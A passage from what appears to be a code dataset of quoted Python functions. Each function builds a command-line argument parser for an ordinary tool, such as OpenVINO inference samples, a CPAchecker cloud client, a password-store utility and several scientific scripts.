NOTE: You will still need to provide the\n version (-v) of the installers.\n \"\"\"), formatter_class=argparse.RawTextHelpFormatter)\n\n parser.add_argument('--log', action='store_true', dest='log', default=False,\n help=\"save a log of any errors discovered\")\n parser.add_argument('-v', '--version', action='store', default=False,\n help=\"version of Anaconda to download and test\")\n parser.add_argument('--no-download', action='store_true', dest='nodl', default=False,\n help=\"test local anaconda packages in pkgs, rather than download new ones\")\n\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.5,\n help=\"Probability threshold for detections filtering\"\n \"(0.5 by default)\")\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.5,\n help=\"Probability threshold for detections filtering\"\n \"(0.5 by default)\")\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. 
Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.5,\n help=\"Probability threshold for detections filtering\"\n \"(0.5 by default)\")\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.3,\n help=\"Probability threshold for detections filtering\"\n \"(0.3 by default)\")\n return parser", "def _parse_command_line(self):\n DESCRIPTION = (\n \"Application for searching PyLith .cfg parameter files.\"\n )\n\n parser = argparse.ArgumentParser(description=DESCRIPTION,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--path\", action=\"store\",\n dest=\"searchpath\", default=\".\", help=\"Search path for .cfg files.\")\n parser.add_argument(\"--display\", action=\"store\",\n dest=\"display\", default=\"all\", help=\"List of metadata to display in search results.\")\n parser.add_argument(\"--verbose\", action=\"store_true\", dest=\"verbose\",\n help=\"Report missing metadata.\")\n\n parser.add_argument(\"--keywords\", action=\"store\", dest=\"keywords\",\n help=\"Comma delimited list of keywords for filtering search results.\")\n parser.add_argument(\"--features\", action=\"store\", dest=\"features\",\n help=\"Comma delimited list of features for filtering search results.\")\n parser.add_argument(\"--authors\", action=\"store\", dest=\"authors\",\n help=\"Comma delimited list of authors for filtering search results.\")\n parser.add_argument(\"--version\", action=\"store\", dest=\"version\",\n help=\"PyLith version for filtering search results.\")\n parser.add_argument(\"--incompatible\", action=\"store_true\", dest=\"incompatible\",\n help=\"Filter search results to show incompatible parameter files.\")\n parser.add_argument(\"--output-format\", action=\"store\", dest=\"output_format\", \n help=\"Output format\", default=\"txt\", choices=[\"text\", \"markdown\"])\n\n args = parser.parse_args()\n\n return args", "def setup_parser(cls, option_group, args, mkflag):", "def setup_parser(cls, option_group, args, mkflag):", "def _create_parser(self):\n parser = argparse.ArgumentParser(\n description=description,\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n parser.add_argument(\n '-v',\n '--verbose',\n action='store_true',\n default=False,\n help='Verbose mode (turn on logging.info)')\n\n parser.add_argument(\n '-d',\n '--debug',\n action='store_true',\n default=False,\n help='Debug (turn on logging.debug)')\n\n return parser", "def _create_argument_parser():\n\n parser = argparse.ArgumentParser(\n description=\"Execute a CPAchecker run in the VerifierCloud using the web interface.\"\n + \" Command-line parameters can additionally be read from a file if file name 
prefixed with '@' is given as argument.\",\n fromfile_prefix_chars=\"@\",\n add_help=False, # conflicts with -heap\n )\n\n parser.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Prints this help.\")\n\n parser.add_argument(\n \"--cloudMaster\",\n dest=\"cloud_master\",\n default=\"https://vcloud.sosy-lab.org/cpachecker/webclient/\",\n metavar=\"HOST\",\n help=\"Sets the webclient host of the VerifierCloud instance to be used.\",\n )\n\n parser.add_argument(\n \"--cloudPriority\",\n dest=\"cloud_priority\",\n metavar=\"PRIORITY\",\n help=\"Sets the priority for this benchmark used in the VerifierCloud. Possible values are IDLE, LOW, HIGH, URGENT.\",\n )\n\n parser.add_argument(\n \"--cloudCPUModel\",\n dest=\"cpu_model\",\n type=str,\n default=None,\n metavar=\"CPU_MODEL\",\n help=\"Only execute runs in the VerifierCloud on CPU models that contain the given string.\",\n )\n\n parser.add_argument(\n \"--cloudUser\",\n dest=\"cloud_user\",\n metavar=\"USER:PWD\",\n help=\"The user and password for the VerifierCloud.\",\n )\n\n parser.add_argument(\n \"--revision\",\n dest=\"revision\",\n metavar=\"BRANCH:REVISION\",\n help=\"The svn revision of CPAchecker to use.\",\n )\n\n parser.add_argument(\n \"-d\", \"--debug\", action=\"store_true\", help=\"Enable debug output\"\n )\n\n parser.add_argument(\n \"-o\",\n \"--outputpath\",\n dest=\"output_path\",\n type=str,\n default=DEFAULT_OUTPUT_PATH,\n help=\"Output prefix for the generated results. \"\n + \"If the path is a folder files are put into it,\"\n + \"otherwise it is used as a prefix for the resulting files.\",\n )\n parser.add_argument(\n \"--resultFilePattern\",\n dest=\"result_file_pattern\",\n type=str,\n default=\"**\",\n help=\"Only files matching this glob pattern are transported back to the client.\",\n )\n\n parser.add_argument(\n \"-T\",\n \"--timelimit\",\n dest=\"timelimit\",\n default=None,\n type=util.parse_timespan_value,\n help=\"Time limit in seconds\",\n metavar=\"SECONDS\",\n )\n\n parser.add_argument(\n \"-M\",\n \"--memorylimit\",\n dest=\"memorylimit\",\n default=None,\n type=util.parse_memory_value,\n help=\"Memory limit\",\n metavar=\"BYTES\",\n )\n\n parser.add_argument(\n \"-c\",\n \"--corelimit\",\n dest=\"corelimit\",\n type=int,\n default=None,\n metavar=\"N\",\n help=\"Limit the tool to N CPU cores.\",\n )\n\n parser.add_argument(\n \"--version\", action=\"version\", version=\"%(prog)s \" + __version__\n )\n return parser", "def _build_arg_parser():\n parser = argparse.ArgumentParser(\n description=_description,\n add_help=True,\n )\n add_generic_args(parser)\n add_diff_args(parser)\n add_filename_args(parser, [\"base\", \"remote\"])\n\n parser.add_argument(\n '-o', '--output',\n default=None,\n help=\"if supplied, the diff is written to this file. \"\n \"Otherwise it is printed to the terminal.\")\n\n return parser", "def make_cli_parser(self):\n usage = \"\"\"\\\npython %prog [OPTIONS] INTERACTIONS_FILE ANNOTATIONS_FILE\n\nARGUMENTS:\n INTERACTIONS_FILE: a CSV file containing interactions. The file\n should have two columns with headings \"interactor1\" and\n \"interactor2\". The file may have additional columns, which will\n be ignored.\n ANNOTATIONS_FILE: a file containing annotations. The annotations\n file may be in one of two formats:\n - GMT format: if the file ends with the extension \".gmt\", it is\n automatically parsed as a GMT-format file. The file is a\n tab-separated (TSV) format with no headers. The first column\n contains the annotation term. The second column contains a\n description. 
All following columns contain gene IDs for genes\n annotated by that term. Full GMT format specification is\n available from the MSigDB and GSEA website.\n - Two-column format: The file should have a column titled\n \"gene_id\" which has the gene/gene product ID, and a column\n titled \"term\" which contains the term with which the\n gene/product is annotated. The file may have additional\n columns, which will be ignored.\\\n\"\"\"\n self.cli_parser = conflictsparse.ConflictsOptionParser(usage)\n self.cli_parser.add_option('--links-outfile',\n default=LINKS_OUTFILE,\n help=(\"the file to which the links results should \"\n \"be written [default: %default]\")\n )\n self.cli_parser.add_option('--logfile',\n help=(\"the file to which information for the run will \"\n \"be logged [default: {0}]\".format(\n self.logfile_template.format('TIMESTAMP'))\n )\n )", "def create_parser():\n now = datetime.datetime.today()\n default_date = \"{}-{}-{}\".format(now.day, now.month, now.year)\n parser = argparse.ArgumentParser(description=\"Git plugin for automatic insertion of @since and @author annotations \"\n \"into *.java source files in a project.\",\n epilog=\"© Avner & Oded\")\n parser.add_argument(\"-v\", \"--version\", help=\"Display the version of this plugin\", action='store_true')\n parser.add_argument(\"--since\", nargs='?', help=\"Add the @since annotations to project\", const=default_date)\n parser.add_argument(\"--author\", nargs='?', help=\"Add the @author annotations to project\", const=getpass.getuser())\n\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. 
Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.5,\n help=\"Probability threshold for detections filtering\"\n \"(0.5 by default)\")\n parser.add_argument('--log_level', type=str, choices=['debug', 'info', 'warning', 'error', 'critical'])\n return parser", "def cmdline_parser():\n parser = argparse.ArgumentParser(description=\"\"\" \"\"\")\n parser.add_argument(\"-i1\",\n help=\"\"\"viral alignments\"\"\",\n dest=\"viral\",\n required=True)\n parser.add_argument(\"-i2\",\n help=\"\"\"GTA alignments\"\"\",\n dest=\"gta\",\n required=True)\n parser.add_argument(\"-o\",\n dest=\"output\",\n help=\"output image file\")\n return parser", "def build_parser():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='CBIS Health check')\n\n parser.add_argument('-uc', '--uc_hostname',\n required=True,\n help='Undercloud hostname (sample rst-exp3-uc)')\n\n parser.add_argument('-o', '--output',\n default='/tmp',\n help='Output folder')\n\n parser.add_argument('-t', '--test', action='store_const', const=True,\n help='Test Flag for dev mode')\n\n parser.add_argument('-tc', '--test_case', choices=[cls.__name__ for cls in BaseCheck.__subclasses__()],\n help=\"Test case to be checked\")\n\n return parser", "def make_parser():\n parser = argparse.ArgumentParser(prog=__file__.replace(\".py\", \"\"),\n description='simple $PATH tool')\n parser.add_argument('-n', '--nocolor', dest=\"color\",\n action=\"store_false\", default=True,\n help='Turn off ANSI color codes.')\n parser.add_argument('-w', '--nowarn', action=\"store_true\",\n help='Turn off path warnings.')\n subs = parser.add_subparsers(title='subcommands',\n description='The subcommands')\n\n sub = subs.add_parser('replace', description=\"Search & Replace $PATH\")\n sub.set_defaults(cmd='path_replace')\n sub.add_argument('terms', nargs='+',\n help='Format: search:replace, search:replace, ...')\n\n sub = subs.add_parser('show', description=\"Show $PATH compoents\")\n sub.set_defaults(cmd='path_show')\n sub.add_argument('-n', '--nocolor', dest=\"color\",\n action=\"store_false\", default=True,\n help='Turn off ANSI color codes.')\n sub.add_argument('-w', '--nowarn', action=\"store_true\",\n help='Turn off path warnings.')\n\n sub = subs.add_parser('which', description=\"Platform agnostic `which -a`\")\n sub.set_defaults(cmd='path_which')\n sub.add_argument('look', help='Look for this executable')\n sub.add_argument('-n', '--nocolor', dest=\"color\",\n action=\"store_false\", default=True,\n help='Turn off ANSI color codes.')\n sub.add_argument('-v', '--version', action=\"store_true\",\n help='Show version of exact matches.')\n\n return parser", "def generate_parser():\n description = \"%(prog)s -- Data handling, normalization, manipulation, and plotting for HiC and 5C experimental data\"\n epilog = \"For command line options of each command, type: %(prog)s <COMMAND> -h\"\n parser = ap.ArgumentParser(description=description, epilog=epilog)\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s %(version_num)s\" % {'prog':parser.prog, 'version_num':VERSION})\n subparsers = parser.add_subparsers(dest='subcommand')\n\n add_connect_subparser(subparsers)\n add_fragments_subparser(subparsers)\n add_fivecdataset_subparser(subparsers)\n add_fivecproject_subparser(subparsers)\n add_fivecnormalize_subparser(subparsers)\n add_complete_fivec_subparser(subparsers)\n 
add_fivec_heatmap_subparser(subparsers)\n add_fivec_interval_subparser(subparsers)\n add_fivec_combine_replicates_subparser(subparsers)\n add_fends_subparser(subparsers)\n add_hicdataset_subparser(subparsers)\n add_hicproject_subparser(subparsers)\n add_hicnormalize_subparser(subparsers)\n add_complete_hic_subparser(subparsers)\n add_hic_heatmap_subparser(subparsers)\n add_hic_mrheatmap_subparser(subparsers)\n add_hic_interval_subparser(subparsers)\n add_hic_combine_replicates_subparser(subparsers)\n add_quasar_subparser(subparsers)\n return parser", "def _build_parser():\n parser = _ArgumentParser()\n parser.add_argument(\n '-f',\n '--file',\n metavar='PASSDB',\n default=os.path.join(os.path.expanduser('~'), '.storepass.db'),\n help=\"password database file (the default is ~/.storepass.db)\")\n parser.add_argument('-v',\n '--verbose',\n action='count',\n help=\"increase verbosity level\")\n\n # Add sub-commands.\n subparsers = parser.add_subparsers(dest='command')\n _init_parser = subparsers.add_parser(\n 'init', description=\"create a new empty database\")\n _list_parser = subparsers.add_parser('list',\n description=\"list password entries\")\n show_parser = subparsers.add_parser(\n 'show', description=\"display details of a password entry\")\n argument_validity = [(name, [field.name for field in cls.entry_fields])\n for name, cls in _NAME_TO_ENTRY_TYPE_MAP.items()]\n add_edit_epilog = \"property validity for entry types:\\n\" + \"\\n\".join([\n f\" {name + ':':22}{', '.join(args) if len(args) > 0 else '--'}\"\n for name, args in argument_validity\n ])\n add_parser = subparsers.add_parser(\n 'add',\n description=\"add a new password entry\",\n epilog=add_edit_epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n edit_parser = subparsers.add_parser(\n 'edit',\n description=\"edit an existing password entry\",\n epilog=add_edit_epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n delete_parser = subparsers.add_parser(\n 'delete', description=\"delete a password entry\")\n _dump_parser = subparsers.add_parser(\n 'dump', description=\"dump raw database content\")\n\n add_parser.add_argument('--type',\n choices=_NAME_TO_ENTRY_TYPE_MAP.keys(),\n default='generic',\n help=\"entry type (the default is generic)\")\n edit_parser.add_argument('--type',\n choices=_NAME_TO_ENTRY_TYPE_MAP.keys(),\n help=\"entry type\")\n\n # Add command-line arguments to set entry properties.\n for sub_parser in (add_parser, edit_parser):\n common_group = sub_parser.add_argument_group(\n \"optional arguments valid for all entry types\")\n common_group.add_argument(\n '--description',\n metavar='DESC',\n help=\"set the entry description to the specified value\")\n common_group.add_argument(\n '--notes', help=\"set the entry notes to the specified value\")\n\n account_group = sub_parser.add_argument_group(\n \"optional arguments valid for specific entry types\")\n sub_parser.set_defaults(properties={})\n for field in storepass.model.ENTRY_FIELDS:\n if field.is_protected:\n nargs = 0\n help_ = f\"prompt for a value of the {field.name} property\"\n else:\n nargs = None\n help_ = f\"set the {field.name} property to the specified value\"\n account_group.add_argument(\n '--' + field.name,\n metavar=\"VALUE\",\n action=_PropertyAction,\n field=field,\n nargs=nargs,\n #default=argparse.SUPPRESS,\n help=help_)\n\n for sub_parser in (show_parser, add_parser, delete_parser, edit_parser):\n sub_parser.add_argument('entry',\n metavar='ENTRY',\n help=\"password entry\")\n\n return parser", "def 
build_parser():\n parser = argparse.ArgumentParser(usage='$ python recentfeed.py http://domain.com/rss/',\n description='''Takes a list of URLs passed as args.\n Returns the items published today unless otherwise specified.''',\n epilog='')\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", default=False, action=\"store_true\")\n parser.add_argument(\"-d\", \"--days\", dest=\"days\", default=0, action=\"count\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output\", default=\"html\", type=str)\n parser.add_argument(\"urls\", action=\"append\", nargs=\"*\")\n return parser", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n help_str = \\\n 'The collection folder to sort files into. ' \\\n 'If the folder does not exist, it will be created along with the ' \\\n 'necessary contents.'\n parser.add_argument('-c', '--collection', help=help_str)\n\n help_str = \\\n 'The source folder to import files from. Has to exist and ' \\\n 'has to be a folder.'\n parser.add_argument('-s', '--source', help=help_str, required=False)\n\n help_str = \\\n 'View the gallery in random order auto skpping after the' \\\n 'given amount of seconds'\n parser.add_argument('-v', '--view', help=help_str, required=False)\n\n return parser.parse_args()", "def make_cli_parser(self):\n super(BplnArgParser, self).make_cli_parser()\n links_opt = self.cli_parser.add_option('--selected-links',\n help=(\"A CSV-formatted file containing pairs of \"\n \"terms to test. Tests will be done to decide \"\n \"if the annotation term from the first column \"\n \"\\\"is linked to\\\" the annotation term from the \"\n \"second column. [NOTE: Selecting this option \"\n \"restricts the program to only test the matches \"\n \"designated in the file.] [NOTE: This option \"\n \"conflicts with '--selected-terms' and \"\n \"'--selected-terms-with-all'.]\"\n )\n )\n anns_opt = self.cli_parser.add_option('--selected-terms',\n help=(\"A file containing annotation terms to test \"\n \"linkage to each other. The file should contain one \"\n \"term per line. Selecting this option restricts the \"\n \"program to only testing the given terms against \"\n \"each other. [NOTE: This option conflicts with \"\n \"'--selected-links' and \"\n \"'--selected-terms-with-all'.]\"\n )\n )\n anns_all_opt = self.cli_parser.add_option(\n '--selected-terms-with-all',\n help=(\"A file containing annotation terms to test \"\n \"linkage to all other terms (one-against-all and \"\n \"all-against-one). The file should contain one \"\n \"term per line. Selecting this option restricts \"\n \"the program to only testing the given terms \"\n \"against all other terms. 
[NOTE: \"\n \"This option conflicts with '--selected-links' and \"\n \"'--selected-terms'.]\"\n )\n )\n self.cli_parser.register_conflict(\n (links_opt, anns_opt, anns_all_opt))", "def generate_parser():\n description = \"%(prog)s -- Predict RNA expression from cCREs and Ideas states\"\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('-r', '--rna', dest=\"rna\", type=str, action='store', required=True,\n help=\"RNA expression file\")\n parser.add_argument('-s', '--state', dest=\"state\", type=str, action='store', required=True,\n help=\"State file\")\n parser.add_argument('-c', '--cre', dest=\"cre\", type=str, action='store', required=True,\n help=\"CRE file\")\n parser.add_argument('-l', '--lessone', dest=\"lessone\", type=int, action='store', default=0,\n help=\"Cell type to leave out\")\n parser.add_argument('-o', '--output', dest=\"output\", type=str, action='store', default='./out',\n help=\"Output prefix\")\n parser.add_argument('-i', '--iterations', dest=\"iterations\", type=int, action='store', default=100,\n help=\"Refinement iterations\")\n parser.add_argument('-t', '--threads', dest=\"threads\", type=int, action='store', default=1,\n help=\"Number of threads to use\")\n parser.add_argument('--initialization-dist', dest=\"init_dist\", type=int, action='store', default=1000,\n help=\"Beta initialization distance cutoff\")\n parser.add_argument('--promoter-dist', dest=\"promoter_dist\", type=int, action='store',\n help=\"If specified, learn betas for promoters up to promoter distance cutoff\")\n parser.add_argument('--cre-dist', dest=\"cre_dist\", type=int, action='store',\n help=\"CRE distance cutoff\")\n parser.add_argument('--cre-exclude-promoter', dest=\"cre_noprom\", action='store_true',\n help=\"Exclude promoter from CREs\")\n parser.add_argument('--sum-cres', dest=\"sum_cres\", action='store_true',\n help=\"Sum CREs instead of finding overall proportions\")\n parser.add_argument('--correlation', dest=\"correlation\", type=float, action='store', default=0.0,\n help=\"Initial correlation cutoff\")\n parser.add_argument('--pca', dest=\"pca\", type=float, action='store',\n help=\"Convert state ratios into PCAs explaining this much variance\")\n parser.add_argument('--trainstats', dest=\"train_stats\", action='store_true',\n help=\"Output training statistics\")\n parser.add_argument('--max-CREs', dest=\"max_cres\", action='store', type=int, default=0,\n help=\"Maximum number of CREs allowed to be selected per TSS at a time (0 is no max)\")\n parser.add_argument('--skip-training', dest=\"skip_training\", action='store_true',\n help=\"Skip CRE-TSS pairining refinement\")\n parser.add_argument('--shuffle-states', dest=\"shuffle_states\", action='store_true',\n help=\"Shuffle the state proportions of each CRE as a negative control\")\n parser.add_argument('-e', '--eRP', dest=\"eRP\", action='store', type=str,\n help=\"A previously generated eRP TSS-cCRE pair file. 
Passing this will ignore initial TSS-CRE pair selection\")\n parser.add_argument('--seed', dest=\"seed\", action='store', type=int,\n help=\"Random number generator state seed\")\n parser.add_argument('-v', '--verbose', dest=\"verbose\", action='store', type=int, default=2,\n help=\"Verbosity level\")\n return parser", "def _init_parser():\n\t\n\t_parser = argparse.ArgumentParser()\n\t_parser.add_argument(\"--pull\", help=\"pull scripts from UR3\", action=\"store_true\")\n\t_parser.add_argument(\"--create\", help=\"create data base from script files\", action=\"store_true\")\n\t_parser.add_argument(\"--clear\", help=\"clear all data base\", action=\"store_true\")\n\treturn _parser", "def setup_parser():\n\n psr_desc=\"cfdi engine service interface\"\n psr_epi=\"select a config profile to specify defaults\"\n\n psr = argparse.ArgumentParser(\n description=psr_desc, epilog=psr_epi)\n\n psr.add_argument('-nmp', action='store_true', dest='nmp',\n help='unique process approach (useful in development)')\n\n psr.add_argument('-d', action='store_true', dest='debug',\n help='print debug information')\n\n psr.add_argument('-c', '--config', action='store',\n dest='config',\n help='load an specific config profile')\n\n psr.add_argument('-p', '--port', action='store',\n dest='port',\n help='launches service on specific port')\n\n return psr.parse_args()", "def _setup_parser(self):\n parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter,\n description=\"Manage Kiji stuff for MovieAdvisor. Available actions:\\n\\t\" + \\\n \"\\n\\t\".join(self.possible_actions))\n\n # TODO: Detailed help information that prints out all of the available actions and their\n # assumptions\n\n parser.add_argument(\n \"action\",\n nargs='*',\n help=\"Action to take\")\n\n parser.add_argument(\n '--bento-home',\n help='Location of bento box',\n default='kiji-bento-ebi')\n\n parser.add_argument(\n '--bento-tgz',\n help='Bento TAR file name',\n default='kiji-bento-ebi-2.0.2-release.tar.gz')\n\n parser.add_argument(\n '--movie-advisor-home',\n help='Location of checkout of WibiData MovieAdvisor github repo',\n default='movie-advisor')\n\n # Set up dates for training, testing, etc.\n parser.add_argument(\n '--train-start-date',\n default='2013-11-01')\n\n parser.add_argument(\n '--train-end-date',\n default='2013-11-15')\n\n parser.add_argument(\n '--test-start-date',\n default='2013-11-16')\n\n parser.add_argument(\n '--test-end-date',\n default='2013-11-30')\n\n parser.add_argument(\n \"--backtest-results-file\",\n default=\"backtest.txt\")\n\n parser.add_argument(\n \"--kill-bento\",\n action=\"store_true\",\n default=False,\n help=\"Automatically kill existing BentoBox processes.\")\n\n parser.add_argument(\n \"--show-classpath\",\n action=\"store_true\",\n default=False,\n help=\"Echo $KIJI_CLASSPATH and exit\")\n\n return parser", "def setup_parser():\n parser = argparse.ArgumentParser(\n prog=\"fedora-owner-change\")\n parser.add_argument(\n '--nomail', action='store_true',\n help=\"Prints the report instead of sending it by email\")\n parser.add_argument(\n '--debug', action='store_true',\n help=\"Outputs debugging info\")\n return parser", "def parseCommandLine():\n\n # Arguments\n parser = argparse.ArgumentParser(description='''trailer.py checks Fortran files for trailing white space.''',\n epilog='Written by A.Adcroft, 2017.')\n parser.add_argument('files_or_dirs', type=str, nargs='+',\n metavar='FILE|DIR',\n help='''Fortran files or director in which to search for Fortran files (with .f, .f90, .F90 
suffixes).''')\n parser.add_argument('-e','--exclude_dir', type=str, action='append',\n metavar='DIR',\n help='''Exclude directories from search that end in DIR.''')\n parser.add_argument('-l','--line_length', type=int, default=120,\n help='''Maximum allowed length of a line.''')\n parser.add_argument('-d','--debug', action='store_true',\n help='turn on debugging information.')\n args = parser.parse_args()\n\n global debug\n debug = args.debug\n\n main(args)", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # Optional Argument\n parser.add_argument('-l', '--length', metavar='length', type=float, default=2, help='length (meter)')\n parser.add_argument('-k', '--conductivity', metavar='conductivity', type=float, default=0.5, help='constant thermal conductivity (W/m.K)')\n parser.add_argument('-q', '--heatgeneration', metavar='heatgeneration', type=float, default=1000, help='uniform heat generation (kW/m^3)')\n parser.add_argument('-TA', '--tempA', metavar='tempA', type=int, default=100, help='temperature at A (Celcius)')\n parser.add_argument('-TB', '--tempB', metavar='tempB', type=int, default=200, help='temperature at A (Celcius)')\n parser.add_argument('-n', '--nodes', metavar='nodes', type=int, default=5, help='nodes (positive integer)')\n parser.add_argument('-A', '--area', metavar='area', type=float, default=1, help='area (m^2)')\n parser.add_argument('-nf', '--nofigure', action='store_true', help='disable figure')\n parser.add_argument('-nd', '--nodetail', action='store_true', help='disable detail')\n return parser.parse_args()", "def create_parser():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n add_help=False)\n parser.add_argument(\n '--help', '-h',\n action='store_true',\n dest='help',\n help=\"\"\"show this help message and exit\"\"\")\n parser.add_argument(\n '--verbose', '-v',\n action='count',\n default=0,\n help=\"\"\"Enable verbose output from '%(prog)s'. A second and third\n '-v' increases verbosity.\"\"\")\n parser.add_argument(\n '--sequential',\n action='store_true',\n help=\"\"\"Execute analyzer sequentialy.\"\"\")\n parser.add_argument(\n '--cdb',\n metavar='<file>',\n default=\"compile_commands.json\",\n help=\"\"\"The JSON compilation database.\"\"\")\n return parser", "def make_parser():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('-p', '--platform', dest='platform', type=str, required=False, default='')\n return parser", "def create_parser():\n pass", "def get_parser():\n\tparser = argparse.ArgumentParser('preprocessing.py',\n\t\tformatter_class=argparse.RawDescriptionHelpFormatter,\n\t\tdescription=\"\"\"\nRun a piepline for one NICER ObsID data. 
\n\t\t\"\"\"\n\t\t)\n\tversion = '%(prog)s ' + __version__\n\tparser.add_argument('obsid', type=str, \n\t\thelp='ObsID (e.g., 4012010109)')\t\n\treturn parser", "def parse_command_line():\n parser = argparse.ArgumentParser(\"Falcon Quick Scan\")\n parser.add_argument(\"-f\", \"--config\",\n dest=\"config_file\",\n help=\"Path to the configuration file\",\n required=False\n )\n parser.add_argument(\"-l\", \"--log-level\",\n dest=\"log_level\",\n help=\"Default log level (DEBUG, WARN, INFO, ERROR)\",\n required=False\n )\n parser.add_argument(\"-d\", \"--check-delay\",\n dest=\"check_delay\",\n help=\"Delay between checks for scan results\",\n required=False\n )\n parser.add_argument(\"-p\", \"--pattern\",\n dest=\"pattern\",\n help=\"Target file patterns to scan (defaults to *.*)\",\n required=False\n )\n parser.add_argument(\"-r\", \"--region\",\n dest=\"region\",\n help=\"Region the target bucket resides in\",\n required=False\n )\n parser.add_argument(\"-t\", \"--target\",\n dest=\"target\",\n help=\"Target folder or bucket to scan. Bucket must have 's3://' prefix.\",\n required=True\n )\n\n return parser.parse_args()", "def init_parser():\n parser = argparse.ArgumentParser(\n description='Backup application code and data.')\n parser.add_argument('-a', '--app-id', required=True,\n help='the application ID to run the backup for')\n parser.add_argument('--source-code', action='store_true',\n default=False, help='backup the source code too. Disabled by default.')\n parser.add_argument('-d', '--debug', required=False, action=\"store_true\",\n default=False, help='display debug messages')\n parser.add_argument('--skip', required=False, nargs=\"+\",\n help='skip the following kinds, separated by spaces')\n\n return parser", "def parser():\n fetch_all_news_codes()\n load_config_key()\n\n if not sys.argv[1:]:\n print(\"Arguments needed. Use argument --help/-h for more information.\")\n else:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--show_all\", \"-sa\", action=\"store_true\",\n help=\"Shows all available news channel codes.\")\n parser.add_argument(\"--categories\", \"-c\", action=\"store_true\",\n help=\"Shows all available news categories.\")\n parser.add_argument(\"--show\", \"-s\", action=\"store\",\n help=\"Shows all news channel codes for a specified category.\")\n parser.add_argument(\"--news\", \"-n\", type=str, help=\"Shows news articles \"\n \"for a specified news channel code.\")\n args = parser.parse_args()\n\n if args.show_all:\n show_sources_all()\n elif 